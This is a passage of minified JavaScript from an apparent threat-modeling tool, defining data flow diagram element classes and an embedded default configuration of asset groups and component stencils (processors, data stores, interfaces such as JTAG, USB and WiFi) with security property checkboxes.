0:a.map(e=>null!=e&&e.ID?e.ID:e),this.NameChanged.emit(this.GetProperty("Name"))}get ProcessedData(){var a;if(this.OverwriteDataProperties){let e=[];return this.Data.ProcessedDataIDs.forEach(i=>e.push(this.project.GetMyData(i))),e}return null===(a=this.Sender)||void 0===a?void 0:a.GetProperty("ProcessedData")}set ProcessedData(a){this.Data.ProcessedDataIDs=null==a?void 0:a.map(e=>e.ID),a&&a.length>0&&(this.ProcessedDataSensitivity=Math.max(...a.map(e=>e.Sensitivity)))}get ProcessedDataSensitivity(){var a;return this.OverwriteDataProperties?this.Data.ProcessedDataSensitivity:null===(a=this.Sender)||void 0===a?void 0:a.ProcessedDataSensitivity}set ProcessedDataSensitivity(a){this.Data.ProcessedDataSensitivity=a}get OverwriteDataProperties(){return this.Data.OverwriteDataProperties}set OverwriteDataProperties(a){this.Data.OverwriteDataProperties=a;const e=this.GetProperties().find(n=>"ProcessedData"==n.ID);e&&(e.Editable=a);const i=this.GetProperties().find(n=>"ProcessedDataSensitivity"==n.ID);i&&(i.Editable=a)}get FlowType(){return this.Data.FlowType}set FlowType(a){this.Data.FlowType=Number(a),(a==Xs.Extend||a==Xs.Include)&&(this.ShowName=!0,this.LineType=ed.Dashed,this.ArrowPos=a==Xs.Extend?wn.Start:wn.End),this.NameChanged.emit(this.Name)}get ShowName(){return this.Data.ShowName}set ShowName(a){this.Data.ShowName=a,this.NameChanged.emit(this.GetProperty("Name"))}get ShowProtocolDetails(){return this.Data.ShowProtocolDetails}set ShowProtocolDetails(a){this.Data.ShowProtocolDetails=a,this.NameChanged.emit(this.GetProperty("Name"))}get BendFlow(){return this.Data.BendFlow}set BendFlow(a){this.Data.BendFlow=a,this.BendFlowChanged.emit(a)}get LineType(){return this.Data.LineType}set LineType(a){this.Data.LineType=Number(a),this.LineTypeChanged.emit(a)}get ArrowPos(){return this.Data.ArrowPos}set ArrowPos(a){this.Data.ArrowPos=Number(a),this.ArrowPosChanged.emit(a)}ChangeDirection(){let a=this.Sender;this.Sender=this.Receiver,this.Receiver=a,a=this.SenderInterface,this.SenderInterface=this.ReceiverInterface,this.ReceiverInterface=a,this.DirectionChanged.emit()}GetProperty(a){var e;return!this.OverwriteProtocolProperties&&(null===(e=this.protocolProperties)||void 0===e?void 0:e.includes(a))?this.ProtocolStack.some(i=>i.GetProperty(a)):super.GetProperty(a)}SetProperty(a,e){super.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.Sender","Sender","",!0,Ii.ElementName,!0),this.AddProperty("properties.SenderInterface","SenderInterface","",!0,Ii.InterfaceElementSelect,!0),this.AddProperty("properties.Receiver","Receiver","",!0,Ii.ElementName,!0),this.AddProperty("properties.ReceiverInterface","ReceiverInterface","",!0,Ii.InterfaceElementSelect,!0),this.AddProperty("properties.Direction","","",!1,Ii.DataFlowChangeDirection,!0),this.AddProperty("properties.ShowName","ShowName","",!0,Ii.CheckBox,!0),this.AddProperty("properties.ShowProtocolDetails","ShowProtocolDetails","",!0,Ii.CheckBox,!0),this.AddProperty("properties.BendFlow","BendFlow","",!0,Ii.CheckBox,!0),this.AddProperty("properties.ArrowPos","ArrowPos","",!0,Ii.ArrowPosition,!0)}}rs.Icon="timeline",rs.ElementTypeID=Et.DataFlow;class Ys extends lc{constructor(a,e,i,n){super(a,e,i,n),this.ChildrenChanged=new Tt,this.Data.childrenIDs||(this.Data.childrenIDs=[]),this.Data.ElementTypeID=Et.None}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Ys.ElementTypeID);return e||(e=a.CreateStencilType(Ys.ElementTypeID),e.Name="DFD Container",e.IsDefault=!0),e}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetDFDElement(e))),a.sort((e,i)=>e.GroupId>=i.GroupId?1:-1)}get Root(){return this.project.GetDFDElement(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}AddChild(a){null!=a?a.ID!=this.ID&&(this.Data.childrenIDs.includes(a.ID)||(a.Parent=this,this.Data.childrenIDs.push(a.ID),this.project.AddDFDElement(a),a instanceof Ys&&(a.Root=this.Root?this.Root:this),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0))):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteDDFElement(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){let a=[];return a.push(...this.GetChildren()),this.GetChildren().forEach(e=>{e instanceof Ys&&a.push(...e.GetChildrenFlat())}),a}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}Ys.Icon="select_all",Ys.ElementTypeID=Et.None;class zm extends Ys{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.project=i,this.config=n,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.TypeChanged.subscribe(a=>this.TypeChanged.emit(a)))}static InstantiateRef(a,e,i){let n=new zm({},a.GetProperty("Type"),e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class M5 extends Ys{}class Up extends M5{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogTrustArea}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Up.ElementTypeID);return e||(e=a.CreateStencilType(Up.ElementTypeID),e.Name="Trust Area",e.IsDefault=!0),e}}Up.ElementTypeID=Et.LogTrustArea;class Gg extends M5{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyTrustArea}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Gg.ElementTypeID);return e||(e=a.CreateStencilType(Gg.ElementTypeID),e.Name="Phy Trust Area",e.IsDefault=!0),e}}Gg.ElementTypeID=Et.PhyTrustArea;const gwe=JSON.parse('{"Data":{"ID":"3bf9addd-53b8-4d01-9971-7128326f856d","Name":"Default Configuration","Description":"","Version":5,"threatLibraryID":"e17870ae-2c37-435c-a284-8df90ff7a5f0","DFDthreatRuleGroupsID":"1d995fc2-d7a5-4f46-ae16-954b8603b7fe","assetGroupID":"58e45260-36fa-43d7-ac37-198dcce12952","stencilThreatRuleGroupsID":"dc027a7a-9824-4b6a-befb-cc68270f2ecb","componentThreatRuleGroupsID":"b02f311c-0bb2-4057-9dde-6225ebbf4e1b","controlLibraryID":"6dd5db7a-e54f-4e6f-858a-33449024cf88"},"assetGroups":[{"ID":"58e45260-36fa-43d7-ac37-198dcce12952","Name":"Asset Groups","Description":"","assetGroupIDs":["cb2b51c2-63a8-4f7a-bf0b-a6ec8b248b78","148b81d8-2c0a-454d-a95c-d993e67c7266","fd5d32e6-212c-4b26-a129-d1a87d014c1d","9e0b09ae-246e-4000-b17d-ff71b142e881"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"9e0b09ae-246e-4000-b17d-ff71b142e881","Name":"Manufacturer Assets","Description":"","assetGroupIDs":["90d512d4-583d-47d1-a174-55d7441b7495"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"fd5d32e6-212c-4b26-a129-d1a87d014c1d","Name":"Owner Assets","Description":"","assetGroupIDs":["15dcf410-df02-4824-83e6-ef80b63a6da9","cb8c3cec-c2ec-444a-a148-9dec9825e92e"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"90d512d4-583d-47d1-a174-55d7441b7495","Name":"Intellectual Property (IP)","Description":"","assetGroupIDs":["e0abf169-5402-4fa6-bd56-49e6f154a6d6","354b8f5d-756b-400b-80cb-100182918021","1f2a21a0-c358-4140-861f-c795453f6322"],"assetIDs":["5eb076d6-7bb3-42bc-8727-d1c1b5933afc","ae6eb58b-6f72-470c-8ea3-ff7af01a201a","7fcf997f-5c00-4a8b-9ade-3e8325ad391e"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"148b81d8-2c0a-454d-a95c-d993e67c7266","Name":"User Assets","Description":"","assetGroupIDs":["3ba3acb5-8e8c-49cf-b9d9-86df13c39dd6","2d6f3914-6d2a-46ff-9699-56ec9f0f0034"],"assetIDs":["a0a5e6ff-950a-4da6-a757-ef134f1548b0","d0ed6d37-a544-43d1-b94d-4924cabbf26a"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"cb2b51c2-63a8-4f7a-bf0b-a6ec8b248b78","Name":"Common Assets","Description":"","assetGroupIDs":["abc10bed-01eb-4e3d-8743-f3a48b710844","95809a78-46fd-48a4-a840-d3271b11d71d"],"assetIDs":["346e2669-f5a1-4790-9033-e6937d5448a2"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"15dcf410-df02-4824-83e6-ef80b63a6da9","Name":"Physical Property","Description":"","assetGroupIDs":["9293377e-1a41-40fa-8bd7-e603c7b73fc2","e946820d-0adc-4b9a-a1b1-d7f361c7d82a"],"assetIDs":["fdd56e01-0633-4797-accc-b5c0207d6ebb","077e1f6d-094a-44d6-a8a1-1ac3978f00eb"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"cb8c3cec-c2ec-444a-a148-9dec9825e92e","Name":"Virtual Property","Description":"","assetGroupIDs":["f4a97cef-26dd-48c1-8cce-68d2cf6fab1d","51e182b7-5608-4f8c-9281-3e15725d1837"],"assetIDs":["f15e8bbe-77a8-4b91-bcda-92f4e1c2ed5d","c3910e35-3353-490f-9fc2-da60660e444c"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"95809a78-46fd-48a4-a840-d3271b11d71d","Name":"Functionality & Safety","Description":"","assetGroupIDs":["5e07e85d-cdb4-4c3f-8294-eba6d865eab6","76f4759e-f5d8-4b34-a142-969fbe754562"],"assetIDs":["4aa77061-1e91-430e-a662-6466f3926678","7f62763b-8816-4569-8455-b96788d9e479"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"5e07e85d-cdb4-4c3f-8294-eba6d865eab6","Name":"Logical Operations","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,14,5]},{"ID":"76f4759e-f5d8-4b34-a142-969fbe754562","Name":"Physical Operations","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,15,9,14]},{"ID":"3ba3acb5-8e8c-49cf-b9d9-86df13c39dd6","Name":"Collected Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[1,10,11]},{"ID":"2d6f3914-6d2a-46ff-9699-56ec9f0f0034","Name":"Health","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[9]},{"ID":"e0abf169-5402-4fa6-bd56-49e6f154a6d6","Name":"Hardware IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"354b8f5d-756b-400b-80cb-100182918021","Name":"Software IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"1f2a21a0-c358-4140-861f-c795453f6322","Name":"Process IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"9293377e-1a41-40fa-8bd7-e603c7b73fc2","Name":"Device","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[3,12,14]},{"ID":"e946820d-0adc-4b9a-a1b1-d7f361c7d82a","Name":"Environment","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[9,15]},{"ID":"f4a97cef-26dd-48c1-8cce-68d2cf6fab1d","Name":"Configuration","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,5]},{"ID":"51e182b7-5608-4f8c-9281-3e15725d1837","Name":"Generated Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,1,10]},{"ID":"abc10bed-01eb-4e3d-8743-f3a48b710844","Name":"Authentication Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[1,2,4,5,10]}],"myData":[],"stencilTypes":[{"Name":"Process","Description":"","ElementTypeID":11,"IsDefault":true,"ID":"e0b99432-98a6-4e32-86d7-ca5f58897cc2","Properties":[{"DisplayName":"Sanitizes Input","ID":"47889e58-6875-4fe5-aa04-91ea9054a166","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Sanitizes Output","ID":"5afac92d-d86d-49bc-8fd8-84242a651767","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Uses Authorization Mechanism","ID":"eb92cc8a-bceb-48a5-b0fd-0894a1d91c5c","Tooltip":"Implements or uses a mechanism for authorization","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Processor","Description":"","ElementTypeID":12,"IsDefault":true,"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Data Store","Description":"","ElementTypeID":21,"IsDefault":true,"Properties":[{"DisplayName":"Contains Logs","ID":"ContainsLogs","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Contains Sensitive Data","ID":"ContainsSensitiveData","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Contains User Data","ID":"ContainsUserData","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}],"ID":"c7598413-4382-43e9-9904-fd9d877eb7a9"},{"Name":"Phy Data Store","Description":"","ElementTypeID":22,"IsDefault":true,"Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Is Encrypted","ID":"IsEncrypted","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Checks Integrity","ID":"c31746fb-c296-4eda-b7a5-8227640e9c80","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Allows Boot","ID":"43deca38-18ab-4c2b-98f0-52f0b1bfefac","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Volatile","ID":"IsVolatile","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Removable","ID":"IsRemovable","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Writable","ID":"IsWritable","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is Multiple Writable","ID":"IsMultipleWritable","Editable":false,"Type":"Check Box","DefaultValue":true}],"ID":"80aa0465-21e0-41bd-b521-84a346c5f54b"},{"Name":"Ext. Entity","Description":"","ElementTypeID":31,"IsDefault":true,"ID":"02b39924-b8f2-44da-a2bc-be1bd2450f68","Properties":[{"DisplayName":"Allows User Input","ID":"7632a126-216a-4463-83ef-6ce82331d9f8","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Phy Ext. Entity","Description":"","ElementTypeID":32,"IsDefault":true,"ID":"03e3750c-8549-4589-8269-e0121b3f26a4","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Allows User Input","ID":"18571d26-3d51-45b8-96f0-ff6e273e70c6","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}]},{"Name":"Data Flow","Description":"","ElementTypeID":41,"IsDefault":true,"Properties":[{"DisplayName":"Uses Custom Com. Protocol","ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","Tooltip":"Implements or uses a custom communication protocol","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has JSON Payload","ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Overwrite Data","ID":"OverwriteDataProperties","Tooltip":"By default, processed data and data sensitivity are referenced from sender. Overwrite to set them manually","Editable":true,"HasGetter":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Protocol Stack","ID":"ProtocolStack","Tooltip":"List of protocols used within the communication","Editable":true,"HasGetter":true,"Type":"Protocol Select","DefaultValue":[]},{"DisplayName":"Overwrite Stack","ID":"OverwriteProtocolProperties","Tooltip":"Use either the properties derived from the protocols or define them manually","Editable":true,"HasGetter":true,"Type":"Check Box","DefaultValue":false}],"ID":"b395ada9-bc1d-4df9-b9f3-a1b09ee2a5aa"},{"Name":"Trust Area","Description":"","ElementTypeID":71,"IsDefault":true,"ID":"8f95badd-15c2-4bd6-9146-67b34f24c724","Properties":[]},{"Name":"Phy Trust Area","Description":"","ElementTypeID":72,"IsDefault":true,"ID":"edd93ea1-6122-492c-bbef-332ecf0113b3","Properties":[]},{"Name":"Physical Link","Description":"","ElementTypeID":51,"IsDefault":true,"ID":"04be7cf6-00dd-4aa8-b90b-e9bf105e39e7","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Is Sensor","ID":"NewProperty1","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is Actuator","ID":"NewProperty3","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"Name":"Interface","Description":"","ElementTypeID":61,"IsDefault":true,"Properties":[{"DisplayName":"Is Wireless","ID":"IsWireless","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Enables Access To Critical Function","ID":"db9caa64-fec1-47e8-9ed8-97896030cc90","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Requires Authentication","ID":"a5bb6218-f4e3-445f-95b3-1fc0be602d36","Tooltip":"Authentication is always required before performing any functionality","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"4e797b3d-fcdd-43ce-953e-8d5af2c47d91"},{"Name":"DFD Container","Description":"","ElementTypeID":0,"IsDefault":true,"ID":"02b4631b-a8fd-47f6-b264-cb5fcedd2b1a","Properties":[]},{"ID":"967a0727-3f2f-4fa8-a549-f9b7bd4efbc5","Name":"Subprocess","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Subprocess Diagram","ID":"SubprocessDiagram","HasGetter":false,"Editable":true,"Type":"Diagram Reference","DefaultValue":false},{"DisplayName":"Go To Subprocess","ID":"SubprocessDiagram","HasGetter":false,"Tooltip":"","Editable":false,"Type":"Diagram Reference"}],"ElementTypeID":11},{"Name":"Microprocessor","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Has Trusted Execution Environment","ID":"HasTrustedExecutionEnvironment","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Root of Trust","ID":"HasRootofTrust","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5"},{"Name":"ASIC","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Is Custom Design","ID":"IsCustomDesign","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is In-House Produced","ID":"IsIn-HouseProduced","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"6065e8dd-23c0-4dc9-ad51-628af88f3309"},{"Name":"Crypto Processor","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Has True RNG","ID":"HasTrueRNG","Editable":true,"Type":"Check Box","DefaultValue":true,"Tooltip":"Has True Random Number Generator (RNG)"},{"DisplayName":"Has PUF","ID":"HasPUF","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"7b968a35-bdd2-4dec-b54b-6fca0bc93058"},{"ElementTypeID":21,"Name":"File","Description":"","PropertyOverwrites":[],"ID":"9ebca319-a256-406b-b548-28a4b44f15b1","IsDefault":false,"Properties":[]},{"Name":"Config File","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[],"PropertyOverwrites":[],"ID":"9ebe3a8f-eedb-40cd-9cbf-d1012a1829e2"},{"Name":"User Database","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[{"DisplayName":"Password Is Hashed","ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Password Is Salted","ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","Tooltip":"Password hash is calculated of the joining of password and salt","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"ContainsUserData","Value":true}],"ID":"367702af-ceba-459b-84e5-27efe918968e"},{"Name":"Log File","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"ContainsLogs","Value":true}],"ID":"a74ba004-2165-4721-9b9b-2ce4b9df88c2"},{"Name":"SRAM","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[{"DisplayName":"Clears Content on State Transition","ID":"NewProperty1","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsVolatile","Value":true}],"ID":"69401648-0084-45ca-b984-505173c9cdb1"},{"Name":"FLASH","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"ID":"4409e854-5f53-4e7e-bee5-232c0e27fb40"},{"Name":"OTP","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsMultipleWritable","Value":false}],"ID":"44d3f1c3-d8cb-4fd8-bccf-1fe409b36992"},{"Name":"SD Card","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsRemovable","Value":true}],"ID":"1959aadb-553f-491d-9e5c-665245093d95"},{"Name":"USB Flash Drive","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsRemovable","Value":true}],"ID":"565e2ea5-b296-44b0-a5ca-8b4a06cfcc06"},{"ElementTypeID":31,"Name":"Browser","Description":"","ID":"049bfa6e-d0b9-4f8d-9920-dfaa78523c85","IsDefault":false,"Properties":[]},{"ID":"99f696a1-6684-4650-993c-d83d1cdb35a2","Name":"HTTP","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":41,"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["857c7b5e-e034-41f8-9b60-ee11aa9771f1"]}]},{"ElementTypeID":41,"Name":"HTTPS","Description":"","ID":"4ae2efbd-9c4e-4885-bdaa-ba9f34ed5c9b","IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["21731335-5e66-455c-9b6a-6796ac85577a"]}]},{"ElementTypeID":51,"Name":"Sensor","Description":"","ID":"dffbfc0a-850b-4de0-95fb-ab9ea4273d88","IsDefault":false,"Properties":[{"DisplayName":"Measures Human-related Value","ID":"13649f62-1bd6-4b50-9646-a9df988262a5","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"Name":"JTAG","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Disabled after Production","ID":"e8430761-3c2e-4db0-adbd-5310214574c2","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8"},{"Name":"CAN","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"f9209f6d-3f5b-4e72-8c03-75531058d0f2","templateDFDID":"ffd00d05-c506-4bf9-af35-0b0f56234515"},{"ID":"e1fea26b-dbcf-4c9f-af27-d7453687cded","Name":"UART","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61},{"Name":"SPI","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"c4967596-a83f-4530-84a6-afe75fec1a7b","templateDFDID":"0d2497f5-d83a-44ac-91ca-6453a7a0e2b4"},{"Name":"USB","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Supports HID Class","ID":"23564ce2-4786-4144-85b6-d03de2771d6b","Tooltip":"Supports HID (Human Interface Device) class, which is, for example, used for keyboard and mouse","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Supports Mass Storage Class","ID":"e884ecfe-bda1-4f0b-86f7-3ce0d735aeeb","Tooltip":"Supports mass storage class, which is, for example, used for storing files","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ID":"111a5819-f53f-4a8d-81df-6b756a20efe7","templateDFDID":"054dd0d3-961a-4f18-9aee-92ac1b515392"},{"Name":"Ethernet","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"58e0c62c-e5b7-4e9f-9f8a-f8150cf18930","templateDFDID":"fad91fd1-0a2b-4ab0-a069-5362948e5f47"},{"ID":"4edf4a31-e828-4933-9a87-779083e7167e","Name":"RF Module","Description":"Proprietary protocols, e.g. protocols that use the 860 MHz band","IsDefault":false,"Properties":[{"DisplayName":"Limits Duty Cycle","ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":61,"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"templateDFDID":"5135733f-bcb2-459e-a84b-048c832f5616"},{"Name":"WiFi","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Has WPS","ID":"8fbc9cce-7d30-425a-ac50-c5ca44d206b0","Tooltip":"Supports Wi-Fi Protected Setup (WPS)","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Uses WPA3","ID":"f7509951-f156-4774-89e9-1966b03ef03e","Tooltip":"Uses the Wi-Fi Protected Access 3 protocol","HasGetter":false,"Editable":true,"Type":"Check 